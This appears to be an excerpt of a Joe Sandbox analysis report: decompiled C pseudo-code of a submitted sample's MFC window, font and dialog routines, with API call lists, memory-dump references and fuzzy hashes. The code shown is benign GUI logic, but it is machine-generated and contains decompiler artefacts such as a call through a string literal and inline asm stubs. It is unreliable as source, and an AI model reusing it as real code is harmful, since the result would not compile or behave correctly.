                                            			E00428D7F(intOrPtr* __ecx) {
                                            				struct tagSIZE _v12;
                                            				int _v16;
                                            				struct tagSIZE _v24;
                                            				void* _v28;
                                            				int _v32;
                                            				struct tagLOGFONTA _v92;
                                            				struct tagTEXTMETRICA _v148;
                                            				void* _t64;
                                            				long _t70;
                                            				void* _t79;
                                            				signed int _t83;
                                            				signed int _t84;
                                            				void* _t91;
                                            				int _t117;
                                            				void* _t119;
                                            				void** _t122;
                                            
                                            				_t121 = __ecx;
                                            				if( *(__ecx + 8) != 0) {
                                            					_t64 =  *(__ecx + 0x2c);
                                            					if(_t64 == 0) {
                                            						_push(0xe);
                                            						return  *((intOrPtr*)( *__ecx + 0x24))();
                                            					}
                                            					if( *((intOrPtr*)(__ecx + 4)) != 0) {
                                            						GetObjectA(_t64, 0x3c,  &_v92);
                                            						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
                                            						GetTextMetricsA( *(__ecx + 8),  &_v148);
                                            						_t70 = _v148.tmHeight;
                                            						if(_t70 >= 0) {
                                            							_v92.lfHeight = _v148.tmInternalLeading - _t70;
                                            						} else {
                                            							_v92.lfHeight = _t70;
                                            						}
                                            						_v92.lfWidth = _v148.tmAveCharWidth;
                                            						_v92.lfWeight = _v148.tmWeight;
                                            						_v92.lfItalic = _v148.tmItalic;
                                            						_v92.lfUnderline = _v148.tmUnderlined;
                                            						_v92.lfStrikeOut = _v148.tmStruckOut;
                                            						_v92.lfCharSet = _v148.tmCharSet;
                                            						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
                                            						_t79 = CreateFontIndirectA( &_v92);
                                            						_v28 = _t79;
                                            						SelectObject( *(_t121 + 4), _t79);
                                            						GetTextMetricsA( *(_t121 + 4),  &_v148);
                                            						_t83 = _v148.tmHeight;
                                            						_t117 =  ~(_v92.lfHeight);
                                            						if(_t83 >= 0) {
                                            							_t84 = _t83 - _v148.tmInternalLeading;
                                            						} else {
                                            							_t84 =  ~_t83;
                                            						}
                                            						_v16 = _t84;
                                            						GetWindowExtEx( *(_t121 + 4),  &_v12);
                                            						GetViewportExtEx( *(_t121 + 4),  &_v24);
                                            						if(_v12.cy < 0) {
                                            							_v12.cy =  ~(_v12.cy);
                                            						}
                                            						if(_v24.cy < 0) {
                                            							_v24.cy =  ~(_v24.cy);
                                            						}
                                            						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
                                            						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
                                            							_t119 = _v28;
                                            						} else {
                                            							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
                                            							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
                                            							_t119 = CreateFontIndirectA( &_v92);
                                            							SelectObject( *(_t121 + 4), _t119);
                                            							DeleteObject(_v28);
                                            						}
                                            						_t122 = _t121 + 0x28;
                                            						_t91 = E0041A89B(_t122);
                                            						 *_t122 = _t119;
                                            						return _t91;
                                            					}
                                            				}
                                            				return _t64;
                                            			}

                                            APIs
                                            • GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
                                            • GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
                                            • CreateFontIndirectA.GDI32(?), ref: 00428E30
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428E39
                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
                                            • GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
                                            • GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
                                            • CreateFontIndirectA.GDI32(?), ref: 00428ED8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
                                            • String ID:
                                            • API String ID: 3870699365-0
                                            • Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
                                            • Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
                                            • Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
                                            • Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
                                            				signed char _v6;
                                            				signed int _v7;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				struct tagRECT _v112;
                                            				intOrPtr _t141;
                                            				void* _t144;
                                            				intOrPtr _t145;
                                            				intOrPtr _t148;
                                            				void* _t150;
                                            				signed int _t151;
                                            				void* _t161;
                                            				int _t177;
                                            				void* _t184;
                                            				signed int _t188;
                                            				void* _t190;
                                            				signed int _t194;
                                            				void* _t196;
                                            				void* _t198;
                                            				signed int _t205;
                                            				int _t206;
                                            				void* _t219;
                                            				intOrPtr _t238;
                                            				intOrPtr _t241;
                                            				int _t243;
                                            				signed int _t245;
                                            				signed int _t246;
                                            				int _t251;
                                            
                                            				_t241 = __ecx;
                                            				_v16 = __ecx;
                                            				_v8 = E00416528(__ecx);
                                            				GetWindowRect( *(__ecx + 0x1c),  &_v44);
                                            				_t205 = GetSystemMetrics(0x21);
                                            				_v12 = _t205;
                                            				_v28 = GetSystemMetrics(0x20);
                                            				if( *0x439c44 != 0) {
                                            					_t177 = E004136A7(_t241);
                                            					_t251 = _t177;
                                            					_t243 = 2;
                                            					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
                                            						L6:
                                            						if(_t251 < 0xa || _t251 > 0x11) {
                                            							if(_t251 != 4) {
                                            								goto L17;
                                            							}
                                            							goto L9;
                                            						} else {
                                            							L9:
                                            							if((_v7 & 0x00000008) == 0) {
                                            								InflateRect( &_v44,  ~_v28,  ~_t205);
                                            								if((_v7 & 0x00000002) == 0) {
                                            									L17:
                                            									return _t251;
                                            								}
                                            								_t184 = _t251 - 4;
                                            								if(_t184 == 0) {
                                            									L22:
                                            									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
                                            									L23:
                                            									return _t188 + 0xb;
                                            								}
                                            								_t190 = _t184 - 9;
                                            								if(_t190 == 0) {
                                            									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
                                            									L19:
                                            									return _t194 + 0xa;
                                            								}
                                            								_t196 = _t190 - 1;
                                            								if(_t196 == 0) {
                                            									_t188 = 0 | _a8 - _v44.top < 0x00000000;
                                            									goto L23;
                                            								}
                                            								_t198 = _t196 - _t243;
                                            								if(_t198 == 0) {
                                            									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
                                            									goto L19;
                                            								}
                                            								if(_t198 == 1) {
                                            									goto L22;
                                            								}
                                            								goto L17;
                                            							}
                                            							return _t243;
                                            						}
                                            					} else {
                                            						if(_t251 == 3) {
                                            							_t251 = _t243;
                                            						}
                                            						if(GetKeyState(_t243) < 0) {
                                            							L25:
                                            							return 0;
                                            						} else {
                                            							goto L6;
                                            						}
                                            					}
                                            				}
                                            				_push(_a8);
                                            				if(PtInRect( &_v44, _a4.x) == 0) {
                                            					goto L25;
                                            				}
                                            				_t206 = GetSystemMetrics(6);
                                            				_v20 = _t206;
                                            				_t245 = GetSystemMetrics(5);
                                            				_v112.top = _v44.top;
                                            				_v112.left = _v44.left;
                                            				_v112.bottom = _v44.bottom;
                                            				_v112.right = _v44.right;
                                            				_push( &_v112);
                                            				E00422D9C(0);
                                            				CopyRect( &_v60,  &_v112);
                                            				_push(_a8);
                                            				if(PtInRect( &_v60, _a4.x) != 0) {
                                            					_push(1);
                                            					L61:
                                            					_pop(_t144);
                                            					return _t144;
                                            				}
                                            				if((_v8 & 0x00040600) == 0) {
                                            					L56:
                                            					_t141 =  *0x439c9c; // 0x0
                                            					_push(_a8);
                                            					_v44.bottom = _t206 + _t141 + _v44.top;
                                            					if(PtInRect( &_v44, _a4.x) == 0) {
                                            						_push(0xfffffffe);
                                            						goto L61;
                                            					}
                                            					_t145 =  *0x439c98; // 0x0
                                            					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
                                            						L54:
                                            						_push(2);
                                            					} else {
                                            						_push(3);
                                            					}
                                            					goto L61;
                                            				}
                                            				_t246 = _v12;
                                            				_t148 =  *0x439c98; // 0x0
                                            				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
                                            				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
                                            				if(_a8 >= _v44.top + _t246) {
                                            					_t238 = _v44.bottom;
                                            					if(_a8 < _t238 - _t246) {
                                            						_t151 = _v28;
                                            						if(_a4.x >= _v44.left + _t151) {
                                            							if(_a4.x < _v44.right - _t151) {
                                            								InflateRect( &_v44,  ~_t151,  ~_v12);
                                            								_t206 = _v20;
                                            								goto L56;
                                            							}
                                            							if((_v7 & 0x00000002) == 0) {
                                            								if(_a8 > _v44.top + _t219) {
                                            									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
                                            								} else {
                                            									_push(0xe);
                                            									goto L51;
                                            								}
                                            							} else {
                                            								_push(0xb);
                                            								goto L51;
                                            							}
                                            						} else {
                                            							if((_v7 & 0x00000002) == 0) {
                                            								if(_a8 <= _v44.top + _t219) {
                                            									goto L33;
                                            								} else {
                                            									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
                                            								}
                                            							} else {
                                            								_push(0xa);
                                            								goto L51;
                                            							}
                                            						}
                                            					} else {
                                            						if((_v7 & 0x00000002) == 0) {
                                            							if(_a4.x > _v44.left + _t150) {
                                            								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
                                            							} else {
                                            								_push(0x10);
                                            								goto L51;
                                            							}
                                            						} else {
                                            							_push(0xf);
                                            							goto L51;
                                            						}
                                            					}
                                            				} else {
                                            					if((_v7 & 0x00000002) == 0) {
                                            						if(_a4.x > _v44.left + _t150) {
                                            							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
                                            						} else {
                                            							L33:
                                            							_push(0xd);
                                            							goto L51;
                                            						}
                                            					} else {
                                            						_push(0xc);
                                            						L51:
                                            						_pop(_t161);
                                            					}
                                            				}
                                            				if((_v7 & 0x00000008) != 0) {
                                            					goto L54;
                                            				}
                                            				return _t161;
                                            			}

                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetWindowRect.USER32 ref: 00422E1F
                                            • GetSystemMetrics.USER32 ref: 00422E2D
                                            • GetSystemMetrics.USER32 ref: 00422E36
                                            • GetKeyState.USER32(00000002), ref: 00422E6B
                                            • InflateRect.USER32(?,?,00000000), ref: 00422EA3
                                            • PtInRect.USER32(?,?,?), ref: 00422F27
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$MetricsSystemWindow$InflateLongState
                                            • String ID:
                                            • API String ID: 90034188-0
                                            • Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
                                            • Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
                                            • Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
                                            • Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00411E32(intOrPtr* __ecx) {
                                            				intOrPtr _t81;
                                            				intOrPtr _t90;
                                            				struct HWND__* _t91;
                                            				intOrPtr* _t142;
                                            				intOrPtr* _t145;
                                            				void* _t147;
                                            				void* _t149;
                                            
                                            				_t118 = __ecx;
                                            				E00406520(E00429CDC, _t147);
                                            				_t145 = __ecx;
                                            				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
                                            				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
                                            				if( *(_t147 + 0x10) == 0) {
                                            					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
                                            				}
                                            				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
                                            				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
                                            				 *(_t147 - 0x14) = 0;
                                            				 *(_t147 - 0x18) = 0;
                                            				 *(_t147 - 4) = 0;
                                            				E0041615D(_t118, 0x10);
                                            				E0041615D(_t118, 0x3c000);
                                            				if(_t142 == 0) {
                                            					L5:
                                            					if( *(_t147 + 8) == 0) {
                                            						L31:
                                            						L33:
                                            						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
                                            						return 0;
                                            					}
                                            					_t81 =  *0x436980; // 0x436994
                                            					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
                                            					 *(_t147 - 4) = 1;
                                            					 *((intOrPtr*)(_t147 - 0x20)) = 0;
                                            					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
                                            						L13:
                                            						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
                                            						 *(_t147 - 4) = 2;
                                            						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
                                            						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
                                            						 *(_t147 - 4) = 1;
                                            						E00416E3C(_t147 - 0x40);
                                            						if( *(_t147 - 0x14) != 0) {
                                            							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
                                            						}
                                            						L15:
                                            						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
                                            						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
                                            						_push(_t145);
                                            						"VWh\rDB"();
                                            						_t90 =  *((intOrPtr*)(_t147 + 0xc));
                                            						if(_t90 != 0) {
                                            							_t91 =  *(_t90 + 0x1c);
                                            						} else {
                                            							_t91 = 0;
                                            						}
                                            						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
                                            						 *(_t147 - 4) = 0;
                                            						E00416AEC(_t147 - 0x1c);
                                            						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
                                            						if(_t142 != 0) {
                                            							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
                                            							if( *(_t147 - 0x18) != 0) {
                                            								 *((intOrPtr*)( *_t145 + 0xb4))(0);
                                            							}
                                            						}
                                            						if(E00413C3E() == 0) {
                                            							 *((intOrPtr*)( *_t145 + 0xa4))();
                                            						}
                                            						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
                                            							DestroyWindow( *(_t147 - 0x18));
                                            							 *(_t147 - 0x18) = 0;
                                            						}
                                            						if( *(_t147 - 0x14) != 0) {
                                            							GlobalUnlock( *(_t147 - 0x14));
                                            							GlobalFree( *(_t147 - 0x14));
                                            						}
                                            						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
                                            							_push(1);
                                            							_pop(0);
                                            							goto L33;
                                            						} else {
                                            							goto L31;
                                            						}
                                            					}
                                            					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
                                            						goto L15;
                                            					} else {
                                            						if( *((short*)(_t147 - 0x20)) == 8) {
                                            							 *((intOrPtr*)(_t147 - 0x20)) = 0;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_push(_t147 - 0x34);
                                            				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
                                            					goto L31;
                                            				}
                                            				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
                                            				goto L5;
                                            			}











                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00411E37
                                            • GetSystemMetrics.USER32 ref: 00411EE9
                                            • GlobalLock.KERNEL32 ref: 00411F73
                                            • CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5
                                              • Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00
                                            • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
                                            • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
                                            • GlobalFree.KERNEL32 ref: 00412036
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                            • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                            • API String ID: 2343056566-2894235370
                                            • Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
                                            • Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
                                            • Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
                                            • Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                                            				struct tagRECT _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				struct tagRECT _v44;
                                            				char _v304;
                                            				void* __ebp;
                                            				int _t69;
                                            				signed char _t72;
                                            				signed char _t77;
                                            				signed int _t82;
                                            				signed int _t84;
                                            				void* _t90;
                                            				struct HWND__* _t94;
                                            				intOrPtr _t122;
                                            				intOrPtr _t130;
                                            				void* _t142;
                                            				signed char _t143;
                                            				signed char _t145;
                                            				intOrPtr _t147;
                                            				void* _t149;
                                            
                                            				_t142 = __edx;
                                            				_t147 = _a4;
                                            				_t122 = __ecx;
                                            				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
                                            				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
                                            					_t143 = 0;
                                            					__eflags = 0;
                                            					L5:
                                            					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
                                            						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
                                            					}
                                            					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
                                            					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
                                            					 *(_t122 + 0x64) = _t72;
                                            					if((_t72 & 0x00000040) == 0) {
                                            						E004165E5(_t147,  &_v304, 0x104);
                                            						E0041A843( *(_t122 + 0x1c),  &_v304);
                                            					}
                                            					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
                                            					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
                                            						_t78 = _t77 & 0x000000fe;
                                            						__eflags = _t77 & 0x000000fe;
                                            					} else {
                                            						_t78 = _t77 | 0x00000001;
                                            					}
                                            					E004263C3(_t147, _t78);
                                            					_v28 = _t143;
                                            					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
                                            						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
                                            						_v28 = 1;
                                            					}
                                            					_v24 = _v24 | 0xffffffff;
                                            					if(_a8 == _t143) {
                                            						_t144 = _t122 + 0x7c;
                                            						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
                                            						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
                                            						_t82 =  *0x439bf4; // 0x2
                                            						_t145 = 0;
                                            						__eflags = 0;
                                            						_t84 =  *0x439bf0; // 0x2
                                            						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
                                            					} else {
                                            						CopyRect( &_v20, _a8);
                                            						E0041A2F1(_t122,  &_v20);
                                            						asm("cdq");
                                            						_t40 =  &(_v20.bottom); // 0x50402834
                                            						asm("cdq");
                                            						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
                                            						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_push(_a4);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v24 = E0041DD44(_t122);
                                            						_t46 =  &(_v20.bottom); // 0x50402834
                                            						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
                                            						_t147 = _a4;
                                            						_t145 = 0;
                                            					}
                                            					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
                                            						if(_t122 != _t145) {
                                            							_t94 =  *(_t122 + 0x1c);
                                            						} else {
                                            							_t94 = 0;
                                            						}
                                            						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
                                            					}
                                            					_t130 =  *((intOrPtr*)(_t147 + 0x70));
                                            					_t165 = _t130 - _t122;
                                            					if(_t130 != _t122) {
                                            						__eflags = _t130 - _t145;
                                            						if(_t130 == _t145) {
                                            							goto L33;
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
                                            						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
                                            							L30:
                                            							__eflags = 0;
                                            							L31:
                                            							_push(0);
                                            							_push(0xffffffff);
                                            							goto L32;
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
                                            						if(__eflags != 0) {
                                            							goto L30;
                                            						}
                                            						_push(1);
                                            						_pop(0);
                                            						goto L31;
                                            					} else {
                                            						_push(_t145);
                                            						_push(_v24);
                                            						L32:
                                            						_push(_t147);
                                            						E0041D609(_t130, _t165);
                                            						L33:
                                            						_t166 = _v28 - _t145;
                                            						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
                                            						if(_v28 != _t145) {
                                            							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
                                            						}
                                            						E0041D5A8(_t122, _t147);
                                            						_t90 = E004225AA(_t122, _t166);
                                            						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
                                            						return _t90;
                                            					}
                                            				}
                                            				_t143 = 0;
                                            				if(_a8 != 0) {
                                            					_t69 = EqualRect( &_v44, _a8);
                                            					if(_t69 == 0) {
                                            						goto L5;
                                            					}
                                            				}
                                            				return _t69;
                                            			}
























                                            APIs
                                            • GetWindowRect.USER32 ref: 0041D1AE
                                            • EqualRect.USER32 ref: 0041D1CB
                                              • Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664
                                            • IsWindowVisible.USER32(?), ref: 0041D254
                                            • CopyRect.USER32 ref: 0041D286
                                            • GetParent.USER32(?), ref: 0041D338
                                            • SetParent.USER32(?,0000E800,00000000), ref: 0041D357
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: RectWindow$Parent$CopyEqualVisible
                                            • String ID: 4(@P$@$@m7@
                                            • API String ID: 3103310903-421610842
                                            • Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
                                            • Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
                                            • Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
                                            • Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 81%
                                            			E00413821(void* __ecx, void* __edx) {
                                            				_Unknown_base(*)()* _t33;
                                            				void* _t35;
                                            				void* _t36;
                                            				void* _t41;
                                            				void* _t44;
                                            				long _t54;
                                            				signed int _t58;
                                            				void* _t61;
                                            				void* _t66;
                                            				struct HWND__* _t68;
                                            				CHAR* _t71;
                                            				void* _t74;
                                            				void* _t75;
                                            				void* _t77;
                                            
                                            				_t66 = __edx;
                                            				_t61 = __ecx;
                                            				E00406520(E00429E08, _t75);
                                            				_t68 =  *(_t75 + 8);
                                            				_t71 = "AfxOldWndProc423";
                                            				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
                                            				_t33 = GetPropA(_t68, _t71);
                                            				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
                                            				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
                                            				 *(_t75 - 0x18) = _t33;
                                            				_t35 =  *(_t75 + 0xc) - 6;
                                            				_t58 = 1;
                                            				if(_t35 == 0) {
                                            					_t36 = E00413740(_t75,  *(_t75 + 0x14));
                                            					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
                                            					goto L9;
                                            				} else {
                                            					_t41 = _t35 - 0x1a;
                                            					if(_t41 == 0) {
                                            						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
                                            						L9:
                                            						if(_t58 != 0) {
                                            							goto L10;
                                            						}
                                            					} else {
                                            						_t44 = _t41 - 0x62;
                                            						if(_t44 == 0) {
                                            							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
                                            							RemovePropA(_t68, _t71);
                                            							GlobalDeleteAtom(GlobalFindAtomA(_t71));
                                            							goto L10;
                                            						} else {
                                            							if(_t44 != 0x8e) {
                                            								L10:
                                            								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
                                            							} else {
                                            								_t74 = E00413740(_t75, _t68);
                                            								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
                                            								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
                                            								_push( *((intOrPtr*)(_t75 - 0x1c)));
                                            								 *(_t75 - 0x14) = _t54;
                                            								_push(_t75 - 0x30);
                                            								_push(_t74);
                                            								E0041342F(_t66);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
